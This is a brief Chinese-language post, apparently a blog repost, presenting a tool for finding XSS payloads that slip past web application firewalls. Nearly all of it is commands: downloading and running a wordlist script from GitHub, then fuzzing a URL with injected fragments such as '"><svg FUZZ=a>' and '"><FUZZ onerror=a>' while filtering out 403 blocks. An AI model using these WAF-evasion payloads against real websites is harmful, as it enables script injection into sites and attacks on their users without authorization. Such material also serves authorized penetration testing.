XSS Bypass Waf 自动化工具

2022-04-02 11:09:03 浏览数 (1)

代码语言：javascript复制

wget https://raw.githubusercontent.com/Ph33rr/Tools-Tips/main/xss/wordxss.sh
chmod 755 wordxss.sh
./wordxss.sh -h

代码语言：javascript复制

使用：

代码语言：javascript复制

./wordxss.sh -m > events.txt
./wordxss.sh -m | anytool

代码语言：javascript复制

fuzz -w events.txt -u 'https://www.example.com/"><svg FUZZ=a>' -fc 403 -c

代码语言：javascript复制

fuzz -w elemnts.txt -u 'https://www.example.com/"><FUZZ onerror=a>' -fc 403 -c

项目地址：

https://github.com/Ph33rr/Tools-Tips/tree/main/xss

0 人点赞